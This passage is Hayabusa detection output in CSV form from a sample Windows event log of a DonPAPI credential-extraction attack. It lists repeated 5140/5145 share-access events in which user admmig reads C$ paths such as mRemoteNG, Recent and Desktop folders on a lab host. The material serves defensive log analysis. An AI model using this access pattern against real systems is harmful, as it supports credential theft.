Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig 
| Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.141 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.147 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.149 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.265 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.268 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.270 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 